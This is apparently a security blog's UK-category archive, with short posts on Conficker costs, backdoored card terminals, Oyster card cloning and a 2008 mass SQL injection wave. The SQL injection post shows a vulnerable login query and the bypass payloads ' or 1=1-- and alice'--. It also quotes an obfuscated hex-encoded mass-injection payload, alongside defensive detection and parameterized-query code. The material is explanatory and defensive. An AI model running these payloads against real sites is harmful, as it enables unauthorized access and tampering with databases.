Category: United Kingdom
July 2nd, 2009
Manchester City Council pays $2.4m in Conficker clean up costs
How severe can the impact of the Conficker worm be on a single city council that apparently did not have basic security controls in place?
Pretty severe, according to a recently released report entitled “Service interruption resulting from ICT disruption in February 2009”, which details the financial costs of a Conficker incident affecting Manchester City Council’s network: 1.5 million pounds in clean-up costs and revenue lost to the downtime.
Where did all the money go, and can the cost of this one incident be used as a baseline for assessing Conficker’s financial impact on affected networks in the long term? Let’s find out.
August 19th, 2008
Scammers caught backdooring chip and PIN terminals
The U.K.’s Dedicated Cheque and Plastic Crime Unit (DCPCU) has recently uncovered a state-of-the-art social engineering scheme in which chip and PIN terminals, backdoored before delivery, were installed at retailers and petrol stations in an attempt to steal the card details passing through them. Before online banking grew, and banker malware grew with it, scammers relied on old-fashioned ATM skimmers and fake keypad devices, installed at less busy locations to reduce the chance of getting caught. What this case demonstrates is that even trusted locations, where you’d assume a physical breach cannot take place that easily, remain vulnerable.
July 30th, 2008
Gary McKinnon – 'world's most dangerous hacker' – to be extradited
The Guardian, out of the United Kingdom, is reporting that Gary McKinnon, the “world’s most dangerous hacker”, will be extradited to the United States to face criminal hacking charges. McKinnon, a 42 year old unemployed systems administrator from north London, allegedly hacked into systems belonging to the US army, navy, air force, and Nasa in 2001. From the article:
He said he was merely searching for evidence of extraterrestrial life, but American officials labeled him the world’s most dangerous hacker and accused him of deleting important files and causing hundreds of thousands of dollars’ worth of damage.
According to prosecutors, McKinnon scanned more than 73,000 US government computers and hacked into 97 machines belonging to the US army, navy, air force and Nasa.
July 29th, 2008
Passports worth £2.5 million stolen in van hijack
Graham Tibbetts of the UK Telegraph is reporting that the British Foreign Office has admitted to losing around 3,000 passports and visa stickers, which were stolen on their way from Manchester to RAF Northolt in London, where they were to be sent to British embassies. From the article:
Officials claimed the chip technology incorporated in the passports would prevent them being used.
But fraud experts said they could be easily cloned and sold on the black market.
July 25th, 2008
Britain moves against illegal file sharing
CBC News out of Canada is reporting that British ISPs are making an aggressive move against illegal file sharing by implementing a program designed to discover copyright violators, who will be sent warning letters and may potentially have their internet connections disconnected.
July 16th, 2008
Big Brother Getting Bigger Part 2: United Kingdom
In a move to bring direct competition to the US on who can be the bigger, badder, more blatant Big Brother, the United Kingdom has apparently decided to create a database holding the telephone numbers and email accounts of everyone in Britain. The details of every phone conversation, SMS, and email, as well as cellphone internet traffic would be held in the database for 12 months.
From a story by Christopher Hope, Home Affairs Editor for telegraph.co.uk:
Gordon Brown signaled plans to bring in the database holding details of every phone call, email and time spent on the internet by the public in last month’s draft Queen’s Speech.
The proposal is part of Government plans to implement a European Union directive which was brought in after the 7 July bombings to encourage uniform record-keeping across EU states.
I find it chilling how each of these major infractions on civil rights validates itself with some previous tragedy; however, it’s actually somewhat refreshing to know that we aren’t the only country going to such ridiculous measures.
July 8th, 2008
U.K.'s most spammed person receives 44,000 spam emails daily
When you get so much spam that your anti-spam provider decides to use you in a marketing campaign, your spam problem turns into an asset for the community, and researchers running honeypots can only envy you for the sample of spam emails you receive on a daily basis. According to a recent press release by ClearMyMail:
“ClearMyMail, has today announced the UK’s Top 5 most spammed email accounts that it protects, receiving a total of 3,900 – 44,000 spam emails each day. Three of these customers have an Orange ISP and in total have around 63,339 spam emails blocked every day and 23,118,735 spam emails blocked every year.
1 – 44,001 emails blocked per day - Orange ISP
2 – 13,578 – Orange ISP
3 – 12,428 – Private domain using 123-reg/GX Networks
4 – 5,760 – Orange ISP
5 – 3,982 – Private domain using 123-reg/GX Networks
Orange customer, Colin Wells – Workshop Foreman for Stagecoach buses – has the most spammed UK inbox and ClearMyMail blocks more than 44,000 emails from entering Wells’ inbox every day, amounting to around 16 million every year.”
Not even McAfee’s 30-day S.P.A.M. experiment can come up with numbers like these, where 3 users receive 63,339 spam emails daily and 23,118,735 every year, mostly because these folks have been interacting with the spam messages for the past couple of years.
June 26th, 2008
Security researchers hack the London Underground for a free ride
A group of Dutch security researchers were able to clone the “smartcards” that commuters use to pay fares in the London Underground system, allowing the group to ride for free. This is an interesting attack vector that I actually talked to Adam Laurie about when I was at Black Hat Amsterdam. I’ve spoken about similar hacks with a number of security researchers, and there’s been some interesting ideas proposed on the subject. In fact, I may just try this on the laundry cards used in my apartment complex. I promise a full write up on how it was done if I manage to pull something off.
I originally saw this story commented on in an article on Wired by Alexander Lew, which commented that:
There are more than 17 million of the transit cards, called Oyster Cards, in circulation. Transport for London says the breach poses no threat to passengers and “the most anyone could gain from a rogue card is one day’s travel.” But this is about more than stealing a free fare or even cribbing any personal information that might be on the cards.
Oyster Cards feature the same Mifare chip used in security cards that provide access to thousands of secure locations. Security experts say the breach poses a threat to public safety and the cards should be replaced.
“The cryptography is simply not fit for purpose,” security consultant Adam Laurie told the Telegraph. “It’s very vulnerable and we can expect the bad guys to hack into it soon if they haven’t already.”
For those not familiar, Adam Laurie is a major player in the computer security research field and has done a ton of interesting research on all number of wireless technology. I’m working on getting Adam to write up a guest editorial or two on what he’s been working on lately.
April 28th, 2008
Developers at fault? SQL Injection attacks lead to wide-spread compromise of IIS servers
There’s been a lot of noise and violent thrashing over the last couple of days regarding what was originally believed to be a flaw in Microsoft’s IIS (Internet Information Server), but has since turned out to be simply a well thought out SQL Injection attack.
For those of you who aren’t familiar with SQL Injection, it’s a well known web application attack vector that is common in dynamic applications, say for instance your banking site. SQL Injection allows an attacker to subvert the logic of the SQL query the application is running in order to read or modify data more interesting to the attacker, bypass authentication/authorization, or in some cases run arbitrary commands on the operating system of the database server. Here’s an example of the attack:
1.) Imagine a web application, such as a banking application, that has a login page. When logging in, the application will take the username and password that you supply and query a database table of users that it knows about. Basically, if your username and password match entries within the database, then you’ll be authenticated.
2.) When a query is created dynamically, and uses user-supplied input (the username and password), without sanitizing them or running them through a parameterized query class, then SQL Injection is possible.
3.) The code might look something like the following (this is roughly Java-like, but you can extend it to your language):
// Vulnerable: the request values are concatenated straight into the SQL text
String query = "select * from USERS_TBL where username='" + request.getParameter("username")
        + "' and password='" + request.getParameter("password") + "'";
// obtain the connection and statement; connection details left out as they are unimportant
Connection con = DriverManager.getConnection(…);
Statement stmt = con.createStatement();
ResultSet rs = stmt.executeQuery(query);
4.) Now, if you look at that code, you’ll notice that the query is constructed with dynamic parameters (username and password) that are pulled from the request object (basically out of the query string or form body of the request) and dropped between a pair of single quotes.
5.) If I supply something the application doesn’t expect as the username, for instance ' or 1=1--, the application executes the resulting SQL as is:
select * from USERS_TBL where username='' or 1=1--' and password='';
Basically, I’ve forced the query into a condition that is always true. The username is blank, or 1=1 (which is true of course), and since this is an OR with an always-true value the whole WHERE clause is true; the -- turns everything after it, including the password check, into a comment. Well, guess what? Now I’ve logged into the application as an authenticated user (usually as the first user the database returns).
6.) SQL Injection is much more dangerous than this in fact, as I can typically pull out all information from all tables (including social security numbers, account numbers, etc.), and in some cases, as with Microsoft SQL Server, I may be able to execute arbitrary commands (xp_cmdshell). It can also be used to insert data into relevant tables (as it appears to have been used here), where an attacker inserts data that later gets rendered in the context of the victim’s browser. Imagine deploying a browser-based attack vector in conjunction with SQL Injection: infect hundreds of thousands of sites, infect millions of users.
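The login bypass walked through above, as an added example that is not from the original post: a Python version (the post’s snippet is Java, but the pattern is identical) against an in-memory SQLite table with constructed sample users. It puts the concatenated query beside the parameterized one and runs both the always-true ' or 1=1-- payload and a second payload, alice'--, that logs in as a chosen account by commenting out the password check. Table name, users and passwords are all assumptions made for the example.

```python
import sqlite3

# Constructed sample user table for this example (in-memory SQLite). The post's
# USERS_TBL with plaintext passwords is kept as-is to stay close to its snippet.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE USERS_TBL (username TEXT, password TEXT)")
    con.executemany("INSERT INTO USERS_TBL VALUES (?, ?)",
                    [("alice", "s3cret"), ("bob", "hunter2")])
    con.commit()
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> bool:
    """The post's pattern: request values concatenated straight into the SQL text.

    Whatever the user types becomes part of the statement, so a quote ends the
    string literal early and the rest of the input is parsed as SQL.
    """
    query = ("select * from USERS_TBL where username='" + username +
             "' and password='" + password + "'")
    return len(con.execute(query).fetchall()) > 0


def login_parameterized(con: sqlite3.Connection, username: str, password: str) -> bool:
    """The fix: placeholders. The statement text is fixed and the driver binds the
    values separately, so a quote or -- in the input is only data to compare."""
    rows = con.execute(
        "select * from USERS_TBL where username=? and password=?",
        (username, password),
    ).fetchall()
    return len(rows) > 0


# The two payloads: the first turns the WHERE clause into an always-true
# condition, the second picks a specific account and comments out the password check.
PAYLOAD_ALWAYS_TRUE = "' or 1=1--"
PAYLOAD_PICK_USER = "alice'--"


def compare(username: str, password: str) -> dict:
    """Run the same credentials through both login routines on fresh databases."""
    return {
        "vulnerable": login_vulnerable(make_db(), username, password),
        "parameterized": login_parameterized(make_db(), username, password),
    }


if __name__ == "__main__":
    for user, pw in [("alice", "s3cret"), ("alice", "wrong"),
                     (PAYLOAD_ALWAYS_TRUE, ""), (PAYLOAD_PICK_USER, "wrong")]:
        print(f"{user!r:16} {pw!r:10} -> {compare(user, pw)}")
```

The parameterized routine rejects both payloads because it looks for a user literally named ' or 1=1-- or alice'--; the vulnerable routine accepts both, and with alice'-- the supplied password is never compared at all.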
Obviously this is really bad. Would you be surprised if I told you it is commonplace to discover these types of flaws in a web application assessment? In any case, back to the matter at hand, which is this wide-scale compromise (estimated at over half a million sites) of Microsoft IIS servers. Sunnet Beskerming, a blogger that I read often, commented on this story as follows:
Although there has been a new IIS vulnerability disclosed in recent weeks, the attacks are only making use of poor site and database maintenance practices - using SQL injection to exploit sites.
For site visitors who visit an affected site, JavaScript is used to try and download / run malware that then targets a number of commonly used technologies in order to gain full control over the system.
It goes to show that input validation is a critical component of the security picture for a site and it is a problem that is still not being properly addressed by many sites, including a lot that should know better.
In one simple set of attacks, previously trustworthy sites can now no longer be considered trustworthy and it is another blow to services that tout their ability to mark a site as being ‘Hacker Safe’ or otherwise safe for visiting (like SiteAdvisor).
Bill Sisk of Microsoft has also commented on the issue:
There have been conflicting public reports describing a recent rash of web server attacks. I want to bring some clarification about the reports and point you to the IIS blog for additional information.
To begin with, our investigation has shown that there are no new or unknown vulnerabilities being exploited. This wave is not a result of a vulnerability in Internet Information Services or Microsoft SQL Server. We have also determined that these attacks are in no way related to Microsoft Security Advisory (951306).
The attacks are facilitated by SQL injection exploits and are not issues related to IIS 6.0, ASP, ASP.Net or Microsoft SQL technologies. SQL injection attacks enable malicious users to execute commands in an application’s database. To protect against SQL injection attacks the developer of the Web site or application must use industry best practices outlined here. Our counterparts over on the IIS blog have written a post with a wealth of information for web developers and IT Professionals can take to minimize their exposure to these types of attacks by minimizing the attack surface area in their code and server configurations. Additional information can be found here: http://blogs.iis.net/bills/archive/2008/04/25/sql-injection-attacks-on-iis-web-servers.aspx
It sounds like, at least from reading several sources such as Dancho Danchev’s and Ronald van den Heetkamp’s blogs, that this is a SQL Injection attack that inserts a malicious JavaScript payload into the database, which is then rendered into victims’ browsers. Victims who view the affected pages are hit with cross-site-scripting-like attacks that try to force them to download malware, etc. It could just as easily (and probably should’ve been) have been combined with something like the latest QuickTime flaw(s) or some of the URI abuse research that I’ve been involved with. Now you can hit millions of users with attack vectors.
What is scariest about this attack is that the group doing the attacking appears to have found a few very reliable attack vectors for SQL Injection; honestly, even more damage could’ve been done, such as scouring the information out of all of these databases, deleting the databases altogether, etc.
Interesting stuff… really shows how serious web application flaws are these days. Good thing we have that strong PCI certification process recommending we have all of our applications go through at a minimum a black box security review… oh wait, that’s right, they suggested web application firewalls. Well, at least web application firewalls are decent at preventing SQL Injections, right? Umm… well, don’t you think that some of the following sites use a WAF and all that’s available to them:
- The UK government web pages
- United Nations web pages
- The Department of Homeland Security
- etc.
Maybe it’s because the attackers encode the attack in a way a WAF signature does not expect: the real SQL is carried as a hex-encoded UTF-16 string inside a CAST() that the server turns back into NVARCHAR and executes (from Ronald van den Heetkamp’s blog):
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C00410052004500200040005400200076006100720063006800610072002800320035003500290020002C00400043002000760061007200630068006100720028003200350035002900200044004500430041004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F00520020000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A0065006300740073002000610 02C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006…
Decoded:
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b…
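An added example, not from the post or from the blogs it quotes, of recovering the SQL hidden in this kind of payload from web server logs. The hex literal is the UTF-16LE encoding of the statement, so a detector has to URL-decode the request, pull out the 0x… literal, decode it, and only then match on words like sysobjects and syscolumns; matching the raw request line for those words finds nothing. The log lines and the complete sample statement are constructed for the example (modelled on the decoded excerpt above, because the copy on this page is truncated); the only data taken from the page is the first run of hex digits, which decodes to “DECLARE @T varchar”. The log format and the marker word list are assumptions.

```python
import re
from urllib.parse import unquote

# The injected statement has the form
#   DECLARE @S NVARCHAR(4000);SET @S=CAST(0x4400450043004C... AS NVARCHAR(4000));EXEC(@S)
# The hex literal is the UTF-16LE encoding of the real SQL, so signature matching on
# the URL-decoded request never sees words like "sysobjects" unless the literal is decoded.
HEX_LITERAL_RE = re.compile(r"0x([0-9A-Fa-f]{16,})")

# Tokens from the decoded payload quoted above: a cursor walking every text column of
# every user table (sysobjects/syscolumns, xtype 99 and 35 are the ntext/text types).
# Marker list is an assumption for this example, not a vendor signature.
INJECTION_MARKERS = ("sysobjects", "syscolumns", "cursor", "xtype")


def decode_hex_payload(hex_literal: str) -> str:
    """Turn the hex digits of a 0x... literal back into SQL text (UTF-16LE)."""
    if len(hex_literal) % 2:  # truncated literal (as on this page): drop the dangling nibble
        hex_literal = hex_literal[:-1]
    return bytes.fromhex(hex_literal).decode("utf-16-le", errors="replace")


def extract_payloads(request_line: str) -> list:
    """URL-decode a request line and return the decoded SQL of every long hex literal in it."""
    decoded = unquote(request_line)
    return [decode_hex_payload(h) for h in HEX_LITERAL_RE.findall(decoded)]


def is_mass_injection(sql: str) -> bool:
    """Flag SQL that walks the system catalog with a cursor, as this wave did."""
    lowered = sql.lower()
    return all(marker in lowered for marker in INJECTION_MARKERS)


def scan_log(lines) -> list:
    """Return (line_number, decoded_sql) for each request carrying a catalog-walking payload."""
    hits = []
    for number, line in enumerate(lines, 1):
        for sql in extract_payloads(line):
            if is_mass_injection(sql):
                hits.append((number, sql))
    return hits


# Taken from the page: the first hex digits of the quoted payload (decodes to "DECLARE @T varchar").
PAGE_HEX_PREFIX = "4400450043004C0041005200450020004000540020007600610072006300680061007200"

# Constructed sample statement modelled on the decoded excerpt above; its hex form is
# built here rather than hand-typed. (The real 2008 payload went on to append a <script> tag.)
SAMPLE_SQL = ("DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR "
              "select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id "
              "and a.xtype='u' and (b.xtype=99 or b.xtype=35)")
SAMPLE_HEX = SAMPLE_SQL.encode("utf-16-le").hex().upper()

# Constructed IIS-style log lines: one benign request, one carrying the encoded statement.
SAMPLE_LOG = [
    "2008-04-25 10:01:02 GET /products.asp id=12 200",
    "2008-04-25 10:01:09 GET /products.asp id=12;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x"
    + SAMPLE_HEX + "%20AS%20NVARCHAR(4000));EXEC(@S);-- 200",
]

if __name__ == "__main__":
    print(decode_hex_payload(PAGE_HEX_PREFIX))
    for number, sql in scan_log(SAMPLE_LOG):
        print(f"line {number}: {sql[:70]}...")
```

Run over a real log, the same three steps (URL-decode, extract the literal, decode UTF-16LE) also expose the JavaScript URL the payload writes into every text column, which is what you need in order to find the pages it poisoned.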
So the end result is that, for now, this looks like another case of bad programming on the part of the developers of the vulnerable applications, not Microsoft. More to come when I hear more.
-Nate
April 22nd, 2008
Websense: UN, UK sites compromised by JavaScript injection
Websense on Tuesday said that the UN and UK government sites are being attacked in a mass JavaScript injection attack.
Websense Security Labs has been tracking a recent development of the malicious JavaScript injection that compromised thousands of domains at the start of this month, just 2-3 weeks ago. The attackers have now switched over to a new domain as their hub for hosting the malicious payload in this attack. We have no doubt that the two attacks are related as our brief analysis below will explain. In the last few hours we have seen the number of compromised sites increase by a factor of ten.
This mass injection is remarkably similar to the attack we saw earlier this month. When a user browses to a compromised site, the injected JavaScript loads a file named 1.js which is hosted on http://www.nihao[removed].com The JavaScript code then redirects the user to 1.htm (also hosted on the same server). Once loaded, the file attempts 8 different exploits (the attack last April utilised 12). The exploits target Microsoft applications, specifically browsers not patched against the VML exploit MS07-004 as well as other applications. Ominously files named McAfee.htm and Yahoo.php are also called by 1.htm but are no longer active at the time of writing.
Is it just me or are hack attacks against governments becoming the norm?
Larry Dignan is Editor in Chief of ZDNet and Editorial Director of ZDNet sister site TechRepublic.